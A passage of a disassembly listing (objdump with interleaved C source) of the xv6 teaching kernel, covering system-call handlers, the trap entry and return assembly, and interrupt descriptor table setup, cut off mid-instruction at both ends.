curproc->cwd = ip; 801054e7: 89 5e 68 mov %ebx,0x68(%esi) return 0; 801054ea: 83 c4 10 add $0x10,%esp 801054ed: 31 c0 xor %eax,%eax } 801054ef: 8d 65 f8 lea -0x8(%ebp),%esp 801054f2: 5b pop %ebx 801054f3: 5e pop %esi 801054f4: 5d pop %ebp 801054f5: c3 ret 801054f6: 8d 76 00 lea 0x0(%esi),%esi 801054f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi end_op(); return -1; } ilock(ip); if(ip->type != T_DIR){ iunlockput(ip); 80105500: 83 ec 0c sub $0xc,%esp 80105503: 53 push %ebx 80105504: e8 f7 c3 ff ff call 80101900 <iunlockput> end_op(); 80105509: e8 b2 d6 ff ff call 80102bc0 <end_op> return -1; 8010550e: 83 c4 10 add $0x10,%esp 80105511: b8 ff ff ff ff mov $0xffffffff,%eax 80105516: eb d7 jmp 801054ef <sys_chdir+0x6f> 80105518: 90 nop 80105519: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi struct inode *ip; struct proc *curproc = myproc(); begin_op(); if(argstr(0, &path) < 0 || (ip = namei(path)) == 0){ end_op(); 80105520: e8 9b d6 ff ff call 80102bc0 <end_op> return -1; 80105525: b8 ff ff ff ff mov $0xffffffff,%eax 8010552a: eb c3 jmp 801054ef <sys_chdir+0x6f> 8010552c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80105530 <sys_exec>: return 0; } int sys_exec(void) { 80105530: 55 push %ebp 80105531: 89 e5 mov %esp,%ebp 80105533: 57 push %edi 80105534: 56 push %esi 80105535: 53 push %ebx char *path, *argv[MAXARG]; int i; uint uargv, uarg; if(argstr(0, &path) < 0 || argint(1, (int*)&uargv) < 0){ 80105536: 8d 85 5c ff ff ff lea -0xa4(%ebp),%eax return 0; } int sys_exec(void) { 8010553c: 81 ec a4 00 00 00 sub $0xa4,%esp char *path, *argv[MAXARG]; int i; uint uargv, uarg; if(argstr(0, &path) < 0 || argint(1, (int*)&uargv) < 0){ 80105542: 50 push %eax 80105543: 6a 00 push $0x0 80105545: e8 06 f5 ff ff call 80104a50 <argstr> 8010554a: 83 c4 10 add $0x10,%esp 8010554d: 85 c0 test %eax,%eax 8010554f: 78 7f js 801055d0 <sys_exec+0xa0> 80105551: 8d 85 60 ff ff ff lea -0xa0(%ebp),%eax 80105557: 83 ec 08 sub $0x8,%esp 8010555a: 50 push %eax 8010555b: 6a 01 push $0x1 8010555d: e8 3e f4 ff ff call 801049a0 <argint> 80105562: 83 c4 10 add $0x10,%esp 80105565: 85 c0 test %eax,%eax 80105567: 78 67 js 801055d0 <sys_exec+0xa0> return -1; } memset(argv, 0, sizeof(argv)); 80105569: 8d 85 68 ff ff ff lea -0x98(%ebp),%eax 8010556f: 83 ec 04 sub $0x4,%esp 80105572: 8d b5 68 ff ff ff lea -0x98(%ebp),%esi 80105578: 68 80 00 00 00 push $0x80 8010557d: 6a 00 push $0x0 8010557f: 8d bd 64 ff ff ff lea -0x9c(%ebp),%edi 80105585: 50 push %eax 80105586: 31 db xor %ebx,%ebx 80105588: e8 03 f1 ff ff call 80104690 <memset> 8010558d: 83 c4 10 add $0x10,%esp for(i=0;; i++){ if(i >= NELEM(argv)) return -1; if(fetchint(uargv+4*i, (int*)&uarg) < 0) 80105590: 8b 85 60 ff ff ff mov -0xa0(%ebp),%eax 80105596: 83 ec 08 sub $0x8,%esp 80105599: 57 push %edi 8010559a: 8d 04 98 lea (%eax,%ebx,4),%eax 8010559d: 50 push %eax 8010559e: e8 5d f3 ff ff call 80104900 <fetchint> 801055a3: 83 c4 10 add $0x10,%esp 801055a6: 85 c0 test %eax,%eax 801055a8: 78 26 js 801055d0 <sys_exec+0xa0> return -1; if(uarg == 0){ 801055aa: 8b 85 64 ff ff ff mov -0x9c(%ebp),%eax 801055b0: 85 c0 test %eax,%eax 801055b2: 74 2c je 801055e0 <sys_exec+0xb0> argv[i] = 0; break; } if(fetchstr(uarg, &argv[i]) < 0) 801055b4: 83 ec 08 sub $0x8,%esp 801055b7: 56 push %esi 801055b8: 50 push %eax 801055b9: e8 82 f3 ff ff call 80104940 <fetchstr> 801055be: 83 c4 10 add $0x10,%esp 801055c1: 85 c0 test %eax,%eax 801055c3: 78 0b js 801055d0 <sys_exec+0xa0> if(argstr(0, &path) < 0 || argint(1, (int*)&uargv) < 0){ return -1; } memset(argv, 0, sizeof(argv)); for(i=0;; i++){ 801055c5: 83 c3 01 add $0x1,%ebx 801055c8: 83 c6 04 add $0x4,%esi if(i >= NELEM(argv)) 801055cb: 83 fb 20 cmp $0x20,%ebx 801055ce: 75 c0 jne 80105590 <sys_exec+0x60> } if(fetchstr(uarg, &argv[i]) < 0) return -1; } return exec(path, argv); } 801055d0: 8d 65 f4 lea -0xc(%ebp),%esp char *path, *argv[MAXARG]; int i; uint uargv, uarg; if(argstr(0, &path) < 0 || argint(1, (int*)&uargv) < 0){ return -1; 801055d3: b8 ff ff ff ff mov $0xffffffff,%eax } if(fetchstr(uarg, &argv[i]) < 0) return -1; } return exec(path, argv); } 801055d8: 5b pop %ebx 801055d9: 5e pop %esi 801055da: 5f pop %edi 801055db: 5d pop %ebp 801055dc: c3 ret 801055dd: 8d 76 00 lea 0x0(%esi),%esi break; } if(fetchstr(uarg, &argv[i]) < 0) return -1; } return exec(path, argv); 801055e0: 8d 85 68 ff ff ff lea -0x98(%ebp),%eax 801055e6: 83 ec 08 sub $0x8,%esp if(i >= NELEM(argv)) return -1; if(fetchint(uargv+4*i, (int*)&uarg) < 0) return -1; if(uarg == 0){ argv[i] = 0; 801055e9: c7 84 9d 68 ff ff ff movl $0x0,-0x98(%ebp,%ebx,4) 801055f0: 00 00 00 00 break; } if(fetchstr(uarg, &argv[i]) < 0) return -1; } return exec(path, argv); 801055f4: 50 push %eax 801055f5: ff b5 5c ff ff ff pushl -0xa4(%ebp) 801055fb: e8 f0 b3 ff ff call 801009f0 <exec> 80105600: 83 c4 10 add $0x10,%esp } 80105603: 8d 65 f4 lea -0xc(%ebp),%esp 80105606: 5b pop %ebx 80105607: 5e pop %esi 80105608: 5f pop %edi 80105609: 5d pop %ebp 8010560a: c3 ret 8010560b: 90 nop 8010560c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80105610 <sys_pipe>: int sys_pipe(void) { 80105610: 55 push %ebp 80105611: 89 e5 mov %esp,%ebp 80105613: 57 push %edi 80105614: 56 push %esi 80105615: 53 push %ebx int *fd; struct file *rf, *wf; int fd0, fd1; if(argptr(0, (void*)&fd, 2*sizeof(fd[0])) < 0) 80105616: 8d 45 dc lea -0x24(%ebp),%eax return exec(path, argv); } int sys_pipe(void) { 80105619: 83 ec 20 sub $0x20,%esp int *fd; struct file *rf, *wf; int fd0, fd1; if(argptr(0, (void*)&fd, 2*sizeof(fd[0])) < 0) 8010561c: 6a 08 push $0x8 8010561e: 50 push %eax 8010561f: 6a 00 push $0x0 80105621: e8 ca f3 ff ff call 801049f0 <argptr> 80105626: 83 c4 10 add $0x10,%esp 80105629: 85 c0 test %eax,%eax 8010562b: 78 4a js 80105677 <sys_pipe+0x67> return -1; if(pipealloc(&rf, &wf) < 0) 8010562d: 8d 45 e4 lea -0x1c(%ebp),%eax 80105630: 83 ec 08 sub $0x8,%esp 80105633: 50 push %eax 80105634: 8d 45 e0 lea -0x20(%ebp),%eax 80105637: 50 push %eax 80105638: e8 b3 db ff ff call 801031f0 <pipealloc> 8010563d: 83 c4 10 add $0x10,%esp 80105640: 85 c0 test %eax,%eax 80105642: 78 33 js 80105677 <sys_pipe+0x67> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 80105644: 31 db xor %ebx,%ebx if(argptr(0, (void*)&fd, 2*sizeof(fd[0])) < 0) return -1; if(pipealloc(&rf, &wf) < 0) return -1; fd0 = -1; if((fd0 = fdalloc(rf)) < 0 || (fd1 = fdalloc(wf)) < 0){ 80105646: 8b 7d e0 mov -0x20(%ebp),%edi // Takes over file reference from caller on success. static int fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); 80105649: e8 32 e1 ff ff call 80103780 <myproc> 8010564e: 66 90 xchg %ax,%ax for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ 80105650: 8b 74 98 28 mov 0x28(%eax,%ebx,4),%esi 80105654: 85 f6 test %esi,%esi 80105656: 74 30 je 80105688 <sys_pipe+0x78> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 80105658: 83 c3 01 add $0x1,%ebx 8010565b: 83 fb 10 cmp $0x10,%ebx 8010565e: 75 f0 jne 80105650 <sys_pipe+0x40> return -1; fd0 = -1; if((fd0 = fdalloc(rf)) < 0 || (fd1 = fdalloc(wf)) < 0){ if(fd0 >= 0) myproc()->ofile[fd0] = 0; fileclose(rf); 80105660: 83 ec 0c sub $0xc,%esp 80105663: ff 75 e0 pushl -0x20(%ebp) 80105666: e8 c5 b7 ff ff call 80100e30 <fileclose> fileclose(wf); 8010566b: 58 pop %eax 8010566c: ff 75 e4 pushl -0x1c(%ebp) 8010566f: e8 bc b7 ff ff call 80100e30 <fileclose> return -1; 80105674: 83 c4 10 add $0x10,%esp } fd[0] = fd0; fd[1] = fd1; return 0; } 80105677: 8d 65 f4 lea -0xc(%ebp),%esp if((fd0 = fdalloc(rf)) < 0 || (fd1 = fdalloc(wf)) < 0){ if(fd0 >= 0) myproc()->ofile[fd0] = 0; fileclose(rf); fileclose(wf); return -1; 8010567a: b8 ff ff ff ff mov $0xffffffff,%eax } fd[0] = fd0; fd[1] = fd1; return 0; } 8010567f: 5b pop %ebx 80105680: 5e pop %esi 80105681: 5f pop %edi 80105682: 5d pop %ebp 80105683: c3 ret 80105684: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ curproc->ofile[fd] = f; 80105688: 8d 73 08 lea 0x8(%ebx),%esi 8010568b: 89 7c b0 08 mov %edi,0x8(%eax,%esi,4) if(argptr(0, (void*)&fd, 2*sizeof(fd[0])) < 0) return -1; if(pipealloc(&rf, &wf) < 0) return -1; fd0 = -1; if((fd0 = fdalloc(rf)) < 0 || (fd1 = fdalloc(wf)) < 0){ 8010568f: 8b 7d e4 mov -0x1c(%ebp),%edi // Takes over file reference from caller on success. static int fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); 80105692: e8 e9 e0 ff ff call 80103780 <myproc> for(fd = 0; fd < NOFILE; fd++){ 80105697: 31 d2 xor %edx,%edx 80105699: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi if(curproc->ofile[fd] == 0){ 801056a0: 8b 4c 90 28 mov 0x28(%eax,%edx,4),%ecx 801056a4: 85 c9 test %ecx,%ecx 801056a6: 74 18 je 801056c0 <sys_pipe+0xb0> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 801056a8: 83 c2 01 add $0x1,%edx 801056ab: 83 fa 10 cmp $0x10,%edx 801056ae: 75 f0 jne 801056a0 <sys_pipe+0x90> if(pipealloc(&rf, &wf) < 0) return -1; fd0 = -1; if((fd0 = fdalloc(rf)) < 0 || (fd1 = fdalloc(wf)) < 0){ if(fd0 >= 0) myproc()->ofile[fd0] = 0; 801056b0: e8 cb e0 ff ff call 80103780 <myproc> 801056b5: c7 44 b0 08 00 00 00 movl $0x0,0x8(%eax,%esi,4) 801056bc: 00 801056bd: eb a1 jmp 80105660 <sys_pipe+0x50> 801056bf: 90 nop int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ curproc->ofile[fd] = f; 801056c0: 89 7c 90 28 mov %edi,0x28(%eax,%edx,4) myproc()->ofile[fd0] = 0; fileclose(rf); fileclose(wf); return -1; } fd[0] = fd0; 801056c4: 8b 45 dc mov -0x24(%ebp),%eax 801056c7: 89 18 mov %ebx,(%eax) fd[1] = fd1; 801056c9: 8b 45 dc mov -0x24(%ebp),%eax 801056cc: 89 50 04 mov %edx,0x4(%eax) return 0; } 801056cf: 8d 65 f4 lea -0xc(%ebp),%esp fileclose(wf); return -1; } fd[0] = fd0; fd[1] = fd1; return 0; 801056d2: 31 c0 xor %eax,%eax } 801056d4: 5b pop %ebx 801056d5: 5e pop %esi 801056d6: 5f pop %edi 801056d7: 5d pop %ebp 801056d8: c3 ret 801056d9: 66 90 xchg %ax,%ax 801056db: 66 90 xchg %ax,%ax 801056dd: 66 90 xchg %ax,%ax 801056df: 90 nop 801056e0 <sys_fork>: #include "mmu.h" #include "proc.h" int sys_fork(void) { 801056e0: 55 push %ebp 801056e1: 89 e5 mov %esp,%ebp return fork(); } 801056e3: 5d pop %ebp #include "proc.h" int sys_fork(void) { return fork(); 801056e4: e9 37 e2 ff ff jmp 80103920 <fork> 801056e9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801056f0 <sys_exit>: } int sys_exit(void) { 801056f0: 55 push %ebp 801056f1: 89 e5 mov %esp,%ebp 801056f3: 83 ec 08 sub $0x8,%esp exit(); 801056f6: e8 b5 e4 ff ff call 80103bb0 <exit> return 0; // not reached } 801056fb: 31 c0 xor %eax,%eax 801056fd: c9 leave 801056fe: c3 ret 801056ff: 90 nop 80105700 <sys_wait>: int sys_wait(void) { 80105700: 55 push %ebp 80105701: 89 e5 mov %esp,%ebp return wait(); } 80105703: 5d pop %ebp } int sys_wait(void) { return wait(); 80105704: e9 e7 e6 ff ff jmp 80103df0 <wait> 80105709: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80105710 <sys_kill>: } int sys_kill(void) { 80105710: 55 push %ebp 80105711: 89 e5 mov %esp,%ebp 80105713: 83 ec 20 sub $0x20,%esp int pid; if(argint(0, &pid) < 0) 80105716: 8d 45 f4 lea -0xc(%ebp),%eax 80105719: 50 push %eax 8010571a: 6a 00 push $0x0 8010571c: e8 7f f2 ff ff call 801049a0 <argint> 80105721: 83 c4 10 add $0x10,%esp 80105724: 85 c0 test %eax,%eax 80105726: 78 18 js 80105740 <sys_kill+0x30> return -1; return kill(pid); 80105728: 83 ec 0c sub $0xc,%esp 8010572b: ff 75 f4 pushl -0xc(%ebp) 8010572e: e8 0d e8 ff ff call 80103f40 <kill> 80105733: 83 c4 10 add $0x10,%esp } 80105736: c9 leave 80105737: c3 ret 80105738: 90 nop 80105739: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi sys_kill(void) { int pid; if(argint(0, &pid) < 0) return -1; 80105740: b8 ff ff ff ff mov $0xffffffff,%eax return kill(pid); } 80105745: c9 leave 80105746: c3 ret 80105747: 89 f6 mov %esi,%esi 80105749: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80105750 <sys_getpid>: int sys_getpid(void) { 80105750: 55 push %ebp 80105751: 89 e5 mov %esp,%ebp 80105753: 83 ec 08 sub $0x8,%esp return myproc()->pid; 80105756: e8 25 e0 ff ff call 80103780 <myproc> 8010575b: 8b 40 10 mov 0x10(%eax),%eax } 8010575e: c9 leave 8010575f: c3 ret 80105760 <sys_sbrk>: int sys_sbrk(void) { 80105760: 55 push %ebp 80105761: 89 e5 mov %esp,%ebp 80105763: 53 push %ebx int addr; int n; if(argint(0, &n) < 0) 80105764: 8d 45 f4 lea -0xc(%ebp),%eax return myproc()->pid; } int sys_sbrk(void) { 80105767: 83 ec 1c sub $0x1c,%esp int addr; int n; if(argint(0, &n) < 0) 8010576a: 50 push %eax 8010576b: 6a 00 push $0x0 8010576d: e8 2e f2 ff ff call 801049a0 <argint> 80105772: 83 c4 10 add $0x10,%esp 80105775: 85 c0 test %eax,%eax 80105777: 78 27 js 801057a0 <sys_sbrk+0x40> return -1; addr = myproc()->sz; 80105779: e8 02 e0 ff ff call 80103780 <myproc> if(growproc(n) < 0) 8010577e: 83 ec 0c sub $0xc,%esp int addr; int n; if(argint(0, &n) < 0) return -1; addr = myproc()->sz; 80105781: 8b 18 mov (%eax),%ebx if(growproc(n) < 0) 80105783: ff 75 f4 pushl -0xc(%ebp) 80105786: e8 15 e1 ff ff call 801038a0 <growproc> 8010578b: 83 c4 10 add $0x10,%esp 8010578e: 85 c0 test %eax,%eax 80105790: 78 0e js 801057a0 <sys_sbrk+0x40> return -1; return addr; 80105792: 89 d8 mov %ebx,%eax } 80105794: 8b 5d fc mov -0x4(%ebp),%ebx 80105797: c9 leave 80105798: c3 ret 80105799: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi { int addr; int n; if(argint(0, &n) < 0) return -1; 801057a0: b8 ff ff ff ff mov $0xffffffff,%eax 801057a5: eb ed jmp 80105794 <sys_sbrk+0x34> 801057a7: 89 f6 mov %esi,%esi 801057a9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801057b0 <sys_sleep>: return addr; } int sys_sleep(void) { 801057b0: 55 push %ebp 801057b1: 89 e5 mov %esp,%ebp 801057b3: 53 push %ebx int n; uint ticks0; if(argint(0, &n) < 0) 801057b4: 8d 45 f4 lea -0xc(%ebp),%eax return addr; } int sys_sleep(void) { 801057b7: 83 ec 1c sub $0x1c,%esp int n; uint ticks0; if(argint(0, &n) < 0) 801057ba: 50 push %eax 801057bb: 6a 00 push $0x0 801057bd: e8 de f1 ff ff call 801049a0 <argint> 801057c2: 83 c4 10 add $0x10,%esp 801057c5: 85 c0 test %eax,%eax 801057c7: 0f 88 8a 00 00 00 js 80105857 <sys_sleep+0xa7> return -1; acquire(&tickslock); 801057cd: 83 ec 0c sub $0xc,%esp 801057d0: 68 80 54 11 80 push $0x80115480 801057d5: e8 46 ed ff ff call 80104520 <acquire> ticks0 = ticks; while(ticks - ticks0 < n){ 801057da: 8b 55 f4 mov -0xc(%ebp),%edx 801057dd: 83 c4 10 add $0x10,%esp uint ticks0; if(argint(0, &n) < 0) return -1; acquire(&tickslock); ticks0 = ticks; 801057e0: 8b 1d c0 5c 11 80 mov 0x80115cc0,%ebx while(ticks - ticks0 < n){ 801057e6: 85 d2 test %edx,%edx 801057e8: 75 27 jne 80105811 <sys_sleep+0x61> 801057ea: eb 54 jmp 80105840 <sys_sleep+0x90> 801057ec: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(myproc()->killed){ release(&tickslock); return -1; } sleep(&ticks, &tickslock); 801057f0: 83 ec 08 sub $0x8,%esp 801057f3: 68 80 54 11 80 push $0x80115480 801057f8: 68 c0 5c 11 80 push $0x80115cc0 801057fd: e8 2e e5 ff ff call 80103d30 <sleep> if(argint(0, &n) < 0) return -1; acquire(&tickslock); ticks0 = ticks; while(ticks - ticks0 < n){ 80105802: a1 c0 5c 11 80 mov 0x80115cc0,%eax 80105807: 83 c4 10 add $0x10,%esp 8010580a: 29 d8 sub %ebx,%eax 8010580c: 3b 45 f4 cmp -0xc(%ebp),%eax 8010580f: 73 2f jae 80105840 <sys_sleep+0x90> if(myproc()->killed){ 80105811: e8 6a df ff ff call 80103780 <myproc> 80105816: 8b 40 24 mov 0x24(%eax),%eax 80105819: 85 c0 test %eax,%eax 8010581b: 74 d3 je 801057f0 <sys_sleep+0x40> release(&tickslock); 8010581d: 83 ec 0c sub $0xc,%esp 80105820: 68 80 54 11 80 push $0x80115480 80105825: e8 16 ee ff ff call 80104640 <release> return -1; 8010582a: 83 c4 10 add $0x10,%esp 8010582d: b8 ff ff ff ff mov $0xffffffff,%eax } sleep(&ticks, &tickslock); } release(&tickslock); return 0; } 80105832: 8b 5d fc mov -0x4(%ebp),%ebx 80105835: c9 leave 80105836: c3 ret 80105837: 89 f6 mov %esi,%esi 80105839: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi release(&tickslock); return -1; } sleep(&ticks, &tickslock); } release(&tickslock); 80105840: 83 ec 0c sub $0xc,%esp 80105843: 68 80 54 11 80 push $0x80115480 80105848: e8 f3 ed ff ff call 80104640 <release> return 0; 8010584d: 83 c4 10 add $0x10,%esp 80105850: 31 c0 xor %eax,%eax } 80105852: 8b 5d fc mov -0x4(%ebp),%ebx 80105855: c9 leave 80105856: c3 ret { int n; uint ticks0; if(argint(0, &n) < 0) return -1; 80105857: b8 ff ff ff ff mov $0xffffffff,%eax 8010585c: eb d4 jmp 80105832 <sys_sleep+0x82> 8010585e: 66 90 xchg %ax,%ax 80105860 <sys_uptime>: // return how many clock tick interrupts have occurred // since start. int sys_uptime(void) { 80105860: 55 push %ebp 80105861: 89 e5 mov %esp,%ebp 80105863: 53 push %ebx 80105864: 83 ec 10 sub $0x10,%esp uint xticks; acquire(&tickslock); 80105867: 68 80 54 11 80 push $0x80115480 8010586c: e8 af ec ff ff call 80104520 <acquire> xticks = ticks; 80105871: 8b 1d c0 5c 11 80 mov 0x80115cc0,%ebx release(&tickslock); 80105877: c7 04 24 80 54 11 80 movl $0x80115480,(%esp) 8010587e: e8 bd ed ff ff call 80104640 <release> return xticks; } 80105883: 89 d8 mov %ebx,%eax 80105885: 8b 5d fc mov -0x4(%ebp),%ebx 80105888: c9 leave 80105889: c3 ret 8010588a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80105890 <sys_adress>: int sys_adress(void) { 80105890: 55 push %ebp 80105891: 89 e5 mov %esp,%ebp return adress (); } 80105893: 5d pop %ebp return xticks; } int sys_adress(void) { return adress (); 80105894: e9 67 e9 ff ff jmp 80104200 <adress> 80105899 <alltraps>: # vectors.S sends all traps here. .globl alltraps alltraps: # Build trap frame. pushl %ds 80105899: 1e push %ds pushl %es 8010589a: 06 push %es pushl %fs 8010589b: 0f a0 push %fs pushl %gs 8010589d: 0f a8 push %gs pushal 8010589f: 60 pusha # Set up data segments. movw $(SEG_KDATA<<3), %ax 801058a0: 66 b8 10 00 mov $0x10,%ax movw %ax, %ds 801058a4: 8e d8 mov %eax,%ds movw %ax, %es 801058a6: 8e c0 mov %eax,%es # Call trap(tf), where tf=%esp pushl %esp 801058a8: 54 push %esp call trap 801058a9: e8 e2 00 00 00 call 80105990 <trap> addl $4, %esp 801058ae: 83 c4 04 add $0x4,%esp 801058b1 <trapret>: # Return falls through to trapret... .globl trapret trapret: popal 801058b1: 61 popa popl %gs 801058b2: 0f a9 pop %gs popl %fs 801058b4: 0f a1 pop %fs popl %es 801058b6: 07 pop %es popl %ds 801058b7: 1f pop %ds addl $0x8, %esp # trapno and errcode 801058b8: 83 c4 08 add $0x8,%esp iret 801058bb: cf iret 801058bc: 66 90 xchg %ax,%ax 801058be: 66 90 xchg %ax,%ax 801058c0 <tvinit>: void tvinit(void) { int i; for(i = 0; i < 256; i++) 801058c0: 31 c0 xor %eax,%eax 801058c2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi SETGATE(idt[i], 0, SEG_KCODE<<3, vectors[i], 0); 801058c8: 8b 14 85 15 a0 10 80 mov -0x7fef5feb(,%eax,4),%edx 801058cf: b9 08 00 00 00 mov $0x8,%ecx 801058d4: c6 04 c5 c4 54 11 80 movb $0x0,-0x7feeab3c(,%eax,8) 801058db: 00 801058dc: 66 89 0c c5 c2 54 11 mov %cx,-0x7feeab3e(,%eax,8) 801058e3: 80 801058e4: c6 04 c5 c5 54 11 80 movb $0x8e,-0x7feeab3b(,%eax,8) 801058eb: 8e 801058ec: 66 89 14 c5 c0 54 11 mov %dx,-0x7feeab40(,%eax,8) 801058f3: 80 801058f4: c1 ea 10 shr $0x10,%edx 801058f7: 66 89 14 c5 c6 54 11 mov %dx,-0x7feeab3a(,%eax,8) 801058fe: 80 void tvinit(void) { int i; for(i = 0; i < 256; i++) 801058ff: 83 c0 01 add $0x1,%eax 80105902: 3d 00 01 00 00 cmp $0x100,%eax 80105907: 75 bf jne 801058c8 <tvinit+0x8> struct spinlock tickslock; uint ticks; void tvinit(void) { 80105909: 55 push %ebp int i; for(i = 0; i < 256; i++) SETGATE(idt[i], 0, SEG_KCODE<<3, vectors[i], 0); SETGATE(idt[T_SYSCALL], 1, SEG_KCODE<<3, vectors[T_SYSCALL], DPL_USER); 8010590a: ba 08 00 00 00 mov $0x8,%edx struct spinlock tickslock; uint ticks; void tvinit(void) { 8010590f: 89 e5 mov %esp,%ebp 80105911: 83 ec 10 sub $0x10,%esp int i; for(i = 0; i < 256; i++) SETGATE(idt[i], 0, SEG_KCODE<<3, vectors[i], 0); SETGATE(idt[T_SYSCALL], 1, SEG_KCODE<<3, vectors[T_SYSCALL], DPL_USER); 80105914: a1 15 a1 10 80 mov 0x8010a115,%eax initlock(&tickslock, "time"); 80105919: 68 3d 7a 10 80 push $0x80107a3d 8010591e: 68 80 54 11 80 push $0x80115480 { int i; for(i = 0; i < 256; i++) SETGATE(idt[i], 0, SEG_KCODE<<3, vectors[i], 0); SETGATE(idt[T_SYSCALL], 1, SEG_KCODE<<3, vectors[T_SYSCALL], DPL_USER); 80105923: 66 89 15 c2 56 11 80 mov %dx,0x801156c2 8010592a: c6 05 c4 56 11 80 00 movb $0x0,0x801156c4 80105931: 66 a3 c0 56 11 80 mov %ax,0x801156c0 80105937: c1 e8 10 shr $0x10,%eax 8010593a: c6 05 c5 56 11 80 ef movb $0xef,0x801156c5 80105941: 66 a3 c6 56 11 80 mov %ax,0x801156c6 initlock(&tickslock, "time"); 80105947: e8 d4 ea ff ff call 80104420 <initlock> } 8010594c: 83 c4 10 add $0x10,%esp 8010594f: c9 leave 80105950: c3 ret 80105951: eb 0d jmp 80105960 <idtinit> 80105953: 90 nop 80105954: 90 nop 80105955: 90 nop 80105956: 90 nop 80105957: 90 nop 80105958: 90 nop 80105959: 90 nop 8010595a: 90 nop 8010595b: 90 nop 8010595c: 90 nop 8010595d: 90 nop 8010595e: 90 nop 8010595f: 90 nop 80105960 <idtinit>: void idtinit(void) { 80105960: 55 push %ebp static inline void lidt(struct gatedesc *p, int size) { volatile ushort pd[3]; pd[0] = size-1; 80105961: b8 ff 07 00 00 mov $0x7ff,%eax 80105966: 89 e5 mov %esp,%ebp 80105968: 83 ec 10 sub $0x10,%esp 8010596b: 66 89 45 fa mov %ax,-0x6(%ebp) pd[1] = (uint)p; 8010596f: b8 c0 54 11 80 mov $0x801154c0,%eax 80105974: 66 89 45 fc mov %ax,-0x4(%ebp) pd[2] = (uint)p >> 16; 80105978: c1 e8 10 shr $0x10,%eax 8010597b: 66 89 45 fe mov %ax,-0x2(%ebp) asm volatile("lidt (%0)" : : "r" (pd)); 8010597f: 8d 45 fa lea -0x6(%ebp),%eax 80105982: 0f 01 18 lidtl (%eax) lidt(idt, sizeof(idt)); } 80105985: c9 leave 80105986: c3 ret 80105987: 89 f6 mov %esi,%esi 80105989: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80105990 <trap>: //PAGEBREAK: 41 void trap(struct trapframe *tf) { 80105990: 55 push %ebp 80105991: 89 e5 mov %esp,%ebp 80105993: 57 push %edi 80105994: 56 push %esi 80105995: 53 push %ebx 80105996: 83 ec 1c sub $0x1c,%esp 80105999: 8b 7d 08 mov 0x8(%ebp),%edi if(tf->trapno == T_SYSCALL){ 8010599c: 8b 47 30 mov 0x30(%edi),%eax 8010599f: 83 f8 40 cmp $0x40,%eax 801059a2: 0f 84 88 01 00 00 je 80105b30 <trap+0x1a0> if(myproc()->killed) exit(); return; } switch(tf->trapno){ 801059a8: 83 e8 20 sub $0x20,%eax 801059ab: 83 f8 1f cmp $0x1f,%eax 801059ae: 77 10 ja 801059c0 <trap+0x30> 801059b0: ff 24 85 e4 7a 10 80 jmp *-0x7fef851c(,%eax,4) 801059b7: 89 f6 mov %esi,%esi 801059b9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi lapiceoi(); break; //PAGEBREAK: 13 default: if(myproc() == 0 || (tf->cs&3) == 0){ 801059c0: e8 bb dd ff ff call 80103780 <myproc> 801059c5: 85 c0 test %eax,%eax 801059c7: 0f 84 d7 01 00 00 je 80105ba4 <trap+0x214> 801059cd: f6 47 3c 03 testb $0x3,0x3c(%edi) 801059d1: 0f 84 cd 01 00 00 je 80105ba4 <trap+0x214> static inline uint rcr2(void) { uint val; asm volatile("movl %%cr2,%0" : "=r" (val)); 801059d7: 0f 20 d1 mov %cr2,%ecx cprintf("unexpected trap %d from cpu %d eip %x (cr2=0x%x)\n", tf->trapno, cpuid(), tf->eip, rcr2()); panic("trap"); } // In user space, assume process misbehaved. cprintf("pid %d %s: trap %d err %d on cpu %d " 801059da: 8b 57 38 mov 0x38(%edi),%edx 801059dd: 89 4d d8 mov %ecx,-0x28(%ebp) 801059e0: 89 55 dc mov %edx,-0x24(%ebp) 801059e3: e8 78 dd ff ff call 80103760 <cpuid> 801059e8: 8b 77 34 mov 0x34(%edi),%esi 801059eb: 8b 5f 30 mov 0x30(%edi),%ebx 801059ee: 89 45 e4 mov %eax,-0x1c(%ebp) "eip 0x%x addr 0x%x--kill proc\n", myproc()->pid, myproc()->name, tf->trapno, 801059f1: e8 8a dd ff ff call 80103780 <myproc> 801059f6: 89 45 e0 mov %eax,-0x20(%ebp) 801059f9: e8 82 dd ff ff call 80103780 <myproc> cprintf("unexpected trap %d from cpu %d eip %x (cr2=0x%x)\n", tf->trapno, cpuid(), tf->eip, rcr2()); panic("trap"); } // In user space, assume process misbehaved. cprintf("pid %d %s: trap %d err %d on cpu %d " 801059fe: 8b 4d d8 mov -0x28(%ebp),%ecx 80105a01: 8b 55 dc mov -0x24(%ebp),%edx 80105a04: 51 push %ecx 80105a05: 52 push %edx "eip 0x%x addr 0x%x--kill proc\n", myproc()->pid, myproc()->name, tf->trapno, 80105a06: 8b 55 e0 mov 